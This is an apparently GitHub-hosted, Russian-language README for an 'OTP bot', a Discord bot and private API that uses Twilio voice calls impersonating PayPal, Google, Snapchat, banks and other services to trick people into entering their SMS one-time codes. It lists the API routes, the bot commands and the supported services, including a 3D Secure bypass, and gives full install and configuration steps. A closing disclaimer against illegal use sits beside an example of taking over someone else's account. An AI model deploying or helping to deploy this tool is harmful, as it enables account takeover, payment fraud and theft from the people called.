
otp bot
Обходите SMS-верификацию для Paypal, Instagram, Snapchat, Google, 3D Secure и многих других... с помощью Discord-бота или приватного API.
Всё очень просто. Представьте, что у вашего друга есть аккаунт Snapchat, и вы пытаетесь сбросить его пароль через SMS-систему:
Затем вы используете бота (!call 33612345678 snapchat). Бот позвонит ему, используя сервис Snapchat, и запросит полученный код. Если он введёт код на цифровой клавиатуре, вы получите код и сможете сбросить пароль. Это как автоматическая система для социальной инженерии.
Доступные и работающие запросы API:
/call с POST DATA:
to: theClientPhoneNumberuser: theUserservice: theUsedServicename: theNameOfTheUserpassword: yourApiPassword/get с POST DATA:
callSid: theCallSidpassword: yourApiPassword/stream/service с GET DATA:
service: theServiceNameYouWannaUse/voice/password с POST DATA:
password: yourApiPasswordcallSid: theCallSidDigits: theDigitsEnteredByTheUSer (необязательно)Все команды администратора:
!user add @user: разрешить кому-то использовать бота и звонки!user delete @user: удалить кого-то или администратора из бота!user info @user: получить информацию о пользователе!user setadmin @user: сделать пользователя администраторомВсе команды пользователей:
!secret yoursecretpassword @user: сделать пользователя администратором, не будучи администратором!call phonenumber service или, например, !call 33612345678 paypal: позвонить на номер с помощью бота и получить SMS-кодПоддерживаемые сервисы звонков:
PaypalGoogleSnapchatInstagramFacebookWhatsappTwitterAmazonCdiscountDefault : work for all the systemsBanque : bypass 3D Secure!call 3312345678 paypal, Discord-бот отправляет POST-запрос в наш приватный API, который сохраняет вызов в базу sqlite DB и отправляет вызов в наш Twilio API./status, чтобы знать, что делать во время звонка; маршрут status возвращает код TwiML для Twilio./status возвращает размещённый на сервере звуковой файл сервиса, используя маршрут /stream/service./status отправляет код в ваш Discord-канал через webhook.Скачайте файлы API с GitHub
git clone https://github.com/Ross1337/SMSBotBypass.git
Перейдите в папку API
cd /SMSBotBypass/api/
Установите зависимости
npm i
Запустите API, подождите 15 секунд, затем остановите его
npm start
Измените файл config.js
Откройте порт 1337
Чтобы проверить, всё ли работает, я сделал полноценную тестовую систему. Если ваш аккаунт Twilio не апгрейжен, перед тестом перейдите в файл /test/call.js и замените номер телефона в строке 122 на свой номер.
npm test

Ваш приватный API теперь работает! Если API не работает, обновите аккаунт Twilio и попробуйте снова.
Будьте осторожны: также нужно изменить язык TTS. Перейдите на https://www.twilio.com/console/voice/twiml/text-to-speech и измените язык TTS с английского на французский с голосом Lea.
Возьмите пароль API из файла config.js в папке api — он нам понадобится
cd ../bots/discord
Измените файл config.js
Создайте две роли Discord: одну "Admin" с правами администратора, а другую "Bot User" с любыми правами.
Добавьте бота на сервер Discord
Инициализируйте Discord-бота
npm i
Теперь вы можете запустить Discord-бота
node bot.js
Вы можете получить всю необходимую информацию в Discord, выполнив !help

Этот код — всего лишь POC-код, не используйте его незаконно. Вы можете быть арестованы за неправильное использование этого кода. Используйте его только со своими номерами телефонов или с людьми, которые согласны протестировать этот код.
Не стесняйтесь вносить вклад в этот проект: сделайте форк и отправьте pull request в этот репозиторий!